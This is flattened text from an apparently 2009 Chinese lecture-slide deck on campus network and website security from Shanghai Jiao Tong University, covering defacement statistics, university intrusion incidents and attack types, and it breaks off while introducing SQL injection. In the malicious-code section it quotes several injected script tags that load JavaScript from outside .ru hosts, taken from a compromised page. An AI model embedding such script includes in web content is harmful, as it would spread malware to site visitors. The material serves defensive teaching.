校园网安全分析(上海交通大学 姜开达博士).pdf

校园网安全分析 上海交通大学网络信息中心 姜开达 2009.4.26 主要内容 Web网站安全和服务器基础安全配置 校园网常见安全问题和应对处理 网络管理中的安全配置 Web 网站安全 Web网站－黑客攻击的首选目标 攻击方式和案例分析 校园网内网站安全状况 Web服务器安全配置 Web 网站遭受攻击的后果 网页被篡改有损学校形象； 网页被别有用心的黑客插入恶意或有害的内容，将造成 很大负面影响； 运行在网站后台的数据库一旦被黑客攻破，将会造成敏 感数据泄漏、失窃或遭受毁灭性破坏，带来很大的麻烦 或遭受相当的经济损失； 网站服务器被黑客掌控，成为散布病毒、木马、恶意软 件等据点，或者被黑客用作攻击他人的跳板。 近几年中国大陆网站被篡改情况 国家计算机网络应急技术处理协调中心 CNCERT/CC2007年网络安全工作报告 CNCERT/CC监测到发现中国大陆被篡改网站的数量近年来增长迅猛。2007年， CNCERT/CC监测到中国大陆被篡改网站总数累积达61228个，是2006年的2.5倍， 2003年的53倍。 记录被篡改网页的国外安全网站 有记录可查的 网站被篡改2580 次 存在恶意代码的 网站 浏览器访问含恶意代码网站的提示 Google 的Safe Browsing API 2008 年8 月24 日清华网站遭黑客攻击 2008 年9 月26 日北大网站又被黑客篡改 2009 年4 月25 日我校医学院网站被篡改 上海交大网站被入侵 2006年6月《黑客防 线》杂志第06期公布 “手工入侵上海交通大 学”一文，列出多个校 内存在安全隐患的网 站，并描述了对校内几 个网站的攻击过程。 复旦大学网站被入侵 攻击类型(篡改首页) 攻击类型(篡改内容) 友情提醒 恶意增加内容 攻击类型(上传后门木马) 攻击类型（网络欺诈） Phishing 攻击类型（恶意代码） /Shownews.asp?id=21 包含以下恶意代码 script src=/ngg.js/script script src=http://www.kjwd.ru/ngg.js/script script src=http://www.oics.ru/ngg.js/script script src=http://www.ujnc.ru/js.js/script script src=http://www.nbh3.ru/js.js/script 可以被利用弹广告，骗点击率，传播木马病毒等。 垃圾广告和恶意评论信息 常出现在论坛，留言版，文章评论，博客 缺乏审核的帖子会带来严重后果 Web 应用三大主要安全漏洞 SQL注入攻击（SQL injection） Internet上最常见、最流行的应用层攻击，主要漏洞存在于用ASP, ASP.NET, PHP, JSP, CGI 脚本语言编写的动态网页。Web 应用系统